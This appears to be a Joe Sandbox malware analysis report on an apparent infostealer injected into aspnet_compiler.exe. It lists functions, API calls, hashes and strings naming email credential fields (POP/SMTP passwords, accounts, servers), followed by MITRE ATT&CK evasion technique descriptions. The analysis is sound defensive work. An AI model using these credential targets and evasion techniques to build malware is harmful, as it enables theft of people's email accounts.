Function 00402BAB Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
RtlFreeHeap.NTDLL(00000000), ref: 00402BC0

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Uniqueness

Uniqueness Score: -1.00%

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Uniqueness

Uniqueness Score: -1.00%

Function 00403C59 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(00000000,00000000,004041B3,00000000,F25E823B,00000000,00000000,?,004041B3,00000000,00000000,00000000), ref: 00403C3C

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 5c28da5d626f681fb06662006ab0c2c95d6c94e8822ad681e7d12da421b0949b
Instruction ID: 708ff4401ac3282b12d7668d94bc51921ab55dbb6f1a62cfe087fe8b706b923f
Opcode Fuzzy Hash: 5c28da5d626f681fb06662006ab0c2c95d6c94e8822ad681e7d12da421b0949b
Instruction Fuzzy Hash: 57D0127200860CBFEF016EE59C05C7B3F5EEB04255B008825BD18E5021DA37DE2076E5

Uniqueness

Uniqueness Score: -1.00%

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Uniqueness

Uniqueness Score: -1.00%

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Uniqueness

Uniqueness Score: -1.00%

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Uniqueness

Uniqueness Score: -1.00%

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Uniqueness

Uniqueness Score: -1.00%

Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Uniqueness

Uniqueness Score: -1.00%

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Uniqueness

Uniqueness Score: -1.00%

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Uniqueness

Uniqueness Score: -1.00%

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Uniqueness

Uniqueness Score: -1.00%

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Uniqueness

Uniqueness Score: -1.00%

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Uniqueness

Uniqueness Score: -1.00%

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

PopAccount, xrefs: 0040D0B6
PopPort, xrefs: 0040D0A7
SmtpServer, xrefs: 0040D0DC
EmailAddress, xrefs: 0040D074
PopServer, xrefs: 0040D099
PopPassword, xrefs: 0040D0D0
SmtpPassword, xrefs: 0040D117
SmtpAccount, xrefs: 0040D0FA
SmtpPort, xrefs: 0040D0EB
Technology, xrefs: 0040D08D

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

